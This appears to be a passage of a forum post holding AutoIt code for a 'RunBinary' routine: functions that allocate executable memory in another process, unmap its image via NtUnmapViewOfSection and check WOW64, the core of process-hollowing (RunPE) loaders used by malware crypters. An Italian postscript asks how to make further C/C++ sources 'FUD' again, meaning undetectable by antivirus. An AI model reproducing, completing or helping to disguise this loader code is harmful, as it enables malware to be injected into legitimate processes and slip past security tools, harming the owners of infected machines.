EndFunc ;==>_runbinary_fixreloc
Func _runbinary_allocateexespaceataddress($hprocess, $paddress, $iSize)
Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", $paddress, "dword_ptr", $iSize, "dword", 4096, "dword", 64)
If @error Or Not $aCall[0] Then
$aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", $paddress, "dword_ptr", $iSize, "dword", 12288, "dword", 64)
If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
EndIf
Return $aCall[0]
EndFunc ;==>_runbinary_allocateexespaceataddress
Func _runbinary_allocateexespace($hprocess, $iSize)
Local $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $hprocess, "ptr", 0, "dword_ptr", $iSize, "dword", 12288, "dword", 64)
If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
Return $aCall[0]
EndFunc ;==>_runbinary_allocateexespace
Func _runbinary_unmapviewofsection($hprocess, $paddress)
DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $hprocess, "ptr", $paddress)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc ;==>_runbinary_unmapviewofsection
Func _runbinary_iswow64process($hprocess)
Local $aCall = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $hprocess, "bool*", 0)
If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
Return $aCall[2]
EndFunc ;==>_runbinary_iswow64process
P.S. Ho anche delle source in C, C++ e altri linguaggi. Sono facili da trovare in rete lo so ma vorrei capire come refuddarli please..
|
